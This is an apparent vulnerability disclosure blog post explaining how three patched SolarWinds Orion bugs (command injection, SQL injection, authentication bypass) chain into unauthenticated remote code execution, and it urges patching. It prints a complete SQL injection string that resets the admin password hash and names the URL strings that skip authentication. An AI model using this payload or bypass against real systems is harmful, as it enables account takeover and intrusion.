Three Bugs in Orion’s Belt: Chaining Multiple bugs for Unauthenticated RCE in the SolarWinds Orion Platform

January 21, 2021 | Guest User

This blog post details a few recently patched vulnerabilities in the SolarWinds Orion Platform. When combined, these bugs can be exploited by an unauthenticated attacker to execute arbitrary code as Administrator on an affected system. One of these vulnerabilities, CVE-2020-14005, has been linked to the recent SUNBURST cyberattack on SolarWinds. However, the exact details around how, or if, this specific bug was used in the wild are still unclear.  

In addition to details of vulnerabilities acquired by ZDI, this blog also contains research from our N-day team about an authentication bypass that allows these bugs to be exploited without authentication. We would like to thank the Trend Micro Security Research team for their efforts in analyzing the technical details of this auth bypass. 

Before we get to the details, here’s a quick video showing how CVE-2020-10148 and CVE-2020-14005 can be used in conjunction to achieve remote code execution as Administrator without authentication.

SolarWinds Account Privileges

SolarWinds users can have any one of the following privileges, some of which are more permissive than others: 

For example, the Alert Management privilege allows a user to modify or create new alerts. An alert is an automated notification that a network event has occurred.

SolarWinds API

Upon installation, the SolarWinds Orion Platform loads a web-based GUI. The SolarWinds REST API can perform the same actions available in this interface.

The ZDI initially learned about this attack surface through an anonymous researcher who was able to show that a user with Alert Management Privileges (henceforth referred to as a non-admin user) can achieve serious side effects on the SolarWinds Orion Platform via the web-based GUI or REST API. 

CVE-2020-14005: Command injection and Execution of Arbitrary VBScript

The product allows a non-admin user to specify a path to a VBS script to be executed when an alert is triggered. There is no restriction on VBS files hosted on a remote SMB share. This lets an attacker specify arbitrary VBS scripts for execution.

The execution of the VBS script is handled by the following method:

During the analysis of this case, we noticed the interpreter parameter can be controlled by manipulating the JSON body of the API request. Hence, by specifying cmd.exe instead of WScript.exe, this vulnerability can be exploited as a straightforward command injection:

Another feature available to non-admin users allows the execution of external scripts, which can be exploited in a similar fashion:

The specified script is later executed by the following:

CVE-2020-27869: SQL Injection Privilege Escalation Vulnerability

There is also a SQL injection vulnerability that is reachable by the Configure Action setting (or corresponding API command) by non-admin users.

These requests are handled by the following code:

As shown, if the “Body to POST” contains the string “${SQL:”, the subsequent string will be evaluated as a SQL statement, which results in a SQL injection. This can allow the takeover of the Administrator account by using the following malicious string:

${SQL: SELECT @@version; UPDATE [dbo].[Accounts] SET PasswordHash = 'Yj505tc0oUwHdI1tgBoOtGWvKlGviV7tGGb276YZwyaADa/iyFhg1JHCJF1RwwNfvYiVGXca1AFFJvrIGgNHdQ==' WHERE AccountID = 'admin'; UPDATE [dbo].[Accounts] SET PasswordSalt= '8M4EuLag9Lpl+d9i0GQKDw==' WHERE AccountID = 'admin'}

CVE-2020-10148: Authentication Bypass

While evaluating the patch introduced by Hotfix 2, our N-day team was analyzing another vulnerability that could be used to bypass authentication altogether. This bug was assigned CVE-2020-10148. The application contains logic to bypass authentication when the client is requesting a resource for which no authentication is necessary, such as JavaScript or Cascading Style Sheets (CSS) files. Specifically, authentication is bypassed if the request URL path contains “Skipi18n” or ends with “i18n.ashx”, “WebResource.axd”, or “ScriptResource.axd”. 

While these individual bugs may not be severe on their own, when they are chained together, they can allow an attacker to gain unauthenticated remote code execution at the highest level. Finding and fixing these types of bugs helps clear the ecosystem of high-impact bugs – hopefully before they are used by an adversary. Applying the fixes from the vendor shores up your defenses and helps prevent unwanted intrusions into your enterprise.

Conclusion

The SolarWinds Orion Platform is a critical piece of infrastructure within an organization. SolarWinds has released patches to address these and other bugs. You should follow this guidance to ensure your system has the latest security updates. We are glad to be able to contribute to the security of this codebase via the ZDI program. Stay tuned for Part 2 of this blog, which will cover vulnerabilities in other components of the SolarWinds Orion Platform with similar effects. 

Until then, you can find me on Twitter at @zebasquared, and follow the team for the latest in exploit techniques and security patches.